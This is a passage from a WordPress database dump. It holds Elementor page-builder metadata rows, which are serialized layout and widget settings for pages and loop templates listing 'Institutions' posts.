\",\"link\":\"\",\"show_icon\":\"none\"}],\"text_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":false}],\"isInner\":false}]'),(26515,3878,'_elementor_edit_mode','builder'),(26516,3878,'_elementor_template_type','loop'),(26517,3878,'_elementor_version','3.4.0'),(26518,3878,'_elementor_pro_version','3.3.6'),(26519,3878,'_wp_page_template','default'),(26520,3878,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26521,3878,'_elementor_data','[{\"id\":\"bc6018c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9a89680\"}]},\"elements\":[{\"id\":\"3ade683\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fcfb3fd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"c79f8b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"80c0337\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"98733fb\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"institutions_category\",\"text_prefix\":\"Type: \",\"link\":\"\",\"show_icon\":\"none\"}]},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":false}],\"isInner\":false}]'),(26523,3879,'_elementor_edit_mode','builder'),(26524,3879,'_elementor_template_type','loop'),(26525,3879,'_elementor_version','3.4.0'),(26526,3879,'_elementor_pro_version','3.3.6'),(26527,3879,'_wp_page_template','default'),(26528,3879,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26529,3879,'_elementor_data','[{\"id\":\"bc6018c\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9a89680\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"3ade683\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fcfb3fd\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"4916186\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"c79f8b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22Institutions%3A%20%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"80c0337\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"98733fb\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"institutions_category\",\"text_prefix\":\"Type: \",\"link\":\"\",\"show_icon\":\"none\"}],\"text_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":false}],\"isInner\":false}]'),(26531,3877,'_elementor_controls_usage','a:5:{s:25:\"theme-post-featured-image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:7:\"link_to\";i:1;s:5:\"image\";i:1;s:4:\"link\";i:1;}}}}s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:2:{s:4:\"view\";i:1;s:9:\"icon_list\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_text_style\";a:1:{s:11:\"text_indent\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),(26533,3880,'_elementor_edit_mode','builder'),(26534,3880,'_elementor_template_type','wp-page'),(26535,3880,'_elementor_version','2.7.5'),(26536,3880,'_wp_page_template','default'),(26537,3880,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\",\"thumb_size\":\"full\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26539,3881,'_elementor_edit_mode','builder'),(26540,3881,'_elementor_template_type','wp-page'),(26541,3881,'_elementor_version','2.7.5'),(26542,3881,'_wp_page_template','default'),(26543,3881,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"institutions_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"400\",\"terms_link_bg_color\":\"rgba(110,193,228,0.72)\",\"terms_link_color\":\"#000000\",\"terms_link_hover_bg_color\":\"#006400\",\"terms_link_hover_color\":\"#ffffff\",\"thumb_size\":\"full\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26545,3882,'_elementor_edit_mode','builder'),(26546,3882,'_elementor_template_type','wp-page'),(26547,3882,'_elementor_version','2.7.5'),(26548,3882,'_wp_page_template','default'),(26549,3882,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26552,89,'_elementor_pro_version','3.3.6'),(26555,3883,'_elementor_edit_mode','builder'),(26556,3883,'_elementor_template_type','wp-page'),(26557,3883,'_elementor_version','3.4.0'),(26558,3883,'_wp_page_template','default'),(26559,3883,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26561,3883,'_elementor_pro_version','3.3.6'),(26563,3884,'_elementor_edit_mode','builder'),(26564,3884,'_elementor_template_type','wp-page'),(26565,3884,'_elementor_version','3.4.0'),(26566,3884,'_wp_page_template','default'),(26567,3884,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26569,3884,'_elementor_pro_version','3.3.6'),(26571,3885,'_elementor_edit_mode','builder'),(26572,3885,'_elementor_template_type','wp-page'),(26573,3885,'_elementor_version','3.4.0'),(26574,3885,'_wp_page_template','default'),(26575,3885,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26577,3885,'_elementor_pro_version','3.3.6'),(26580,3886,'_elementor_edit_mode','builder'),(26581,3886,'_elementor_template_type','wp-page'),(26582,3886,'_elementor_version','3.4.0'),(26583,3886,'_wp_page_template','default'),(26584,3886,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"